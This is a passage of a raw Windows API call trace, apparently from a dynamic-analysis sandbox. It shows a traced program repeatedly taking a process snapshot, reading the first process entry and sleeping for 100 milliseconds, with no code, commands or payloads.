cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.111] Sleep (dwMilliseconds=0x64) [0290.117] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.127] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.185] Sleep (dwMilliseconds=0x64) [0290.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.199] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.249] Sleep (dwMilliseconds=0x64) [0290.252] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.264] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.322] Sleep (dwMilliseconds=0x64) [0290.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.335] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.390] Sleep (dwMilliseconds=0x64) [0290.393] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.404] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.458] Sleep (dwMilliseconds=0x64) [0290.460] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.487] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.543] Sleep (dwMilliseconds=0x64) [0290.545] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.579] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.640] Sleep (dwMilliseconds=0x64) [0290.641] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.657] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.709] Sleep (dwMilliseconds=0x64) [0290.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.723] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.775] Sleep (dwMilliseconds=0x64) [0290.776] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.787] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.837] Sleep (dwMilliseconds=0x64) [0290.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.852] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.917] Sleep (dwMilliseconds=0x64) [0290.920] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0290.933] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.989] Sleep (dwMilliseconds=0x64) [0290.991] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.001] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.058] Sleep (dwMilliseconds=0x64) [0291.062] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.074] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.137] Sleep (dwMilliseconds=0x64) [0291.139] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.149] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.321] Sleep (dwMilliseconds=0x64) [0291.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.335] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.385] Sleep (dwMilliseconds=0x64) [0291.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.397] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.451] Sleep (dwMilliseconds=0x64) [0291.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.463] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.513] Sleep (dwMilliseconds=0x64) [0291.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.525] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.621] Sleep (dwMilliseconds=0x64) [0291.649] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.667] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.720] Sleep (dwMilliseconds=0x64) [0291.722] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.732] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.786] Sleep (dwMilliseconds=0x64) [0291.789] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.799] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.850] Sleep (dwMilliseconds=0x64) [0291.852] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.861] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.910] Sleep (dwMilliseconds=0x64) [0291.912] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.921] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.977] Sleep (dwMilliseconds=0x64) [0291.979] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0291.991] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.056] Sleep (dwMilliseconds=0x64) [0292.057] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.067] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.115] Sleep (dwMilliseconds=0x64) [0292.117] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.127] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.180] Sleep (dwMilliseconds=0x64) [0292.184] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.195] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.249] Sleep (dwMilliseconds=0x64) [0292.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.260] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.317] Sleep (dwMilliseconds=0x64) [0292.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.337] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.421] Sleep (dwMilliseconds=0x64) [0292.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.453] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.533] Sleep (dwMilliseconds=0x64) [0292.536] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.549] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.636] Sleep (dwMilliseconds=0x64) [0292.638] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.652] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.717] Sleep (dwMilliseconds=0x64) [0292.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.733] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.802] Sleep (dwMilliseconds=0x64) [0292.805] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.822] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.909] Sleep (dwMilliseconds=0x64) [0292.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0292.927] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.997] Sleep (dwMilliseconds=0x64) [0293.000] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.014] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.076] Sleep (dwMilliseconds=0x64) [0293.078] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.094] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.154] Sleep (dwMilliseconds=0x64) [0293.157] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.170] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.229] Sleep (dwMilliseconds=0x64) [0293.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.244] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.301] Sleep (dwMilliseconds=0x64) [0293.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.332] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.392] Sleep (dwMilliseconds=0x64) [0293.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.413] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.479] Sleep (dwMilliseconds=0x64) [0293.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.498] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.583] Sleep (dwMilliseconds=0x64) [0293.586] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.602] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.701] Sleep (dwMilliseconds=0x64) [0293.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.721] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.804] Sleep (dwMilliseconds=0x64) [0293.807] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.824] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.896] Sleep (dwMilliseconds=0x64) [0293.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.909] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.975] Sleep (dwMilliseconds=0x64) [0293.977] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0293.996] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.068] Sleep (dwMilliseconds=0x64) [0294.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.088] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.165] Sleep (dwMilliseconds=0x64) [0294.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.185] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.254] Sleep (dwMilliseconds=0x64) [0294.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.272] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.348] Sleep (dwMilliseconds=0x64) [0294.351] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.363] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.428] Sleep (dwMilliseconds=0x64) [0294.431] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.442] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.537] Sleep (dwMilliseconds=0x64) [0294.539] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.597] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.657] Sleep (dwMilliseconds=0x64) [0294.659] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.672] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.735] Sleep (dwMilliseconds=0x64) [0294.751] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.763] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.872] Sleep (dwMilliseconds=0x64) [0294.875] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.889] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.952] Sleep (dwMilliseconds=0x64) [0294.955] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0294.967] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.023] Sleep (dwMilliseconds=0x64) [0295.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.038] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.099] Sleep (dwMilliseconds=0x64) [0295.104] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2434 [0295.114] Process32First (in: hSnapshot=0x2434, lppe=0x10d5fe20 | out: 